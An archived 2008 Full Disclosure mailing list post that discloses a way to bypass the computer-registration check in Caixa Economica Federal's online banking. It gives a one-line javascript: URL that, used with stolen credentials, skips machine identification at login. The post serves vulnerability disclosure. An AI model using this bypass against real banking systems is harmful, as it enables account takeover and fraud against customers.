Full Disclosure mailing list archives

Brazilian Bank (Caixa Economica Federal) vuln
From: "H2G-Labs Information Security" <h2glabs.infosec () gmail com>
Date: Thu, 19 Jun 2008 10:43:08 -0300

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Hi folks,
some Brazilian banks have been implementing a system based on computer
identification (like a PC register).

The system has some vulns and can be easily exploited.

I am trying to contact the Caixa Economica Federal
(http://www.caixa.gov.br) without success.

If the attacker has the USERNAME and the PASSWORD of the user
account, the attacker can log in to the bank account without identifying
the computer.

To do this, after entering the USERNAME and PASSWORD of the account, put the
code in the browser (on the agree-terms page):
javascript:document.forms[0].onsubmit='';document.forms[0].navegacao.value='16';document.forms[0].submit();void(0);

And you will be logged in, without needing to register/identify your machine.

I hope the CAIXA team solves this problem in a hurry.

Sorry for my bad English, I am Brazilian.

Regards...

- --
H2G-Labs Information Security
Igor Marcel - Information Security Consultant
H2GLabs.InfoSec "at" Gmail.com

-----BEGIN PGP SIGNATURE-----
Version: GnuPG (PRIVATE)
Comment: H2G-Labs Information Security
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

